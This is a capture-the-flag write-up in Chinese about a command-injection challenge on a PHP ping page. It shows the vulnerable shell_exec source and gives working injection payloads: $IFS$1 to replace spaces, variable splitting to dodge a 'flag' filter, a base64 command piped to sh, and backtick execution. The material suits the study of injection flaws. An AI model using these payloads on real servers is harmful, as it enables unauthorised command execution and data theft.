根据题目和页面的提示猜测是命令执行漏洞
;前面和后面命令都要执行,无论前面真假
|直接执行后面的语句
||如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句
&前面和后面命令都要执行,无论前面真假
&&如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令
这里尝试想|
/?ip=127.0.0.1|ls
发现成功执行下面有flag.php和index.php
尝试下直接cat查看一下flag.php
发现也没返回fxck your space!
通过这个提示知道过滤了空格
再次尝试发现没有过滤cat 但是过滤了flag
通过?ip=127.0.0.1|tac$IFS$1index.php查看一下index.php
发现不全中间下载源文件
/?ip=
<pre>/?ip=
<?php
if(isset($_GET['ip'])){
$ip = $_GET['ip'];
if(preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{1f}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){
echo preg_match("/\&|\/|\?|\*|\<|[\x{00}-\x{20}]|\>|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match);
die("fxck your symbol!");
} else if(preg_match("/ /", $ip)){
die("fxck your space!");
} else if(preg_match("/bash/", $ip)){
die("fxck your bash!");
} else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
die("fxck your flag!");
}
$a = shell_exec("ping -c 4 ".$ip);
echo "<pre>";
print_r($a);
}
?>
绕过空格
IFS是指内部字段分隔符 $IFS是内部字段分隔符的缩写 简单而言就是空格
$IFS$1 //$1改成$加其他数字都行
创造变量绕过flag
使用;
;前面和后面命令都要执行,无论前面真假
通过;来构建一到两个变量 合并变量让他为flag
b=g
把flag中间的g换成变量$b 即fla$b
?ip=127.0.0.1;b=g;tac$IFS$1fla$b.php
} else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
die("fxck your flag!");
通过代码可以找到会匹配flag而只有先定义g g之前的匹配可以通过
base64 加解码
正如我们可以将过滤掉的关键词进行base65编码来绕过正则,再使用linux命令将编码解读成我们要执行的命令。我们可以将cat flag.php进行base64编码,再用base -d命令解码。
得到dGFjIGZsYWcucGhw
?ip=127.0.0.1|echo$IFS$1dGFjIGZsYWcucGhw|base64$IFS$1-d|sh
内联执行
在linux系统中,反引号是作为内联执行,输出查询结果的内容。比如用ls查询出index.php。那么`ls`就代表了index.php这个文件。那么我们就可以使用cat命令查看index.php的内容,而这一道题就可以使用tac$IFS$1`ls` 这个命令来输出flag了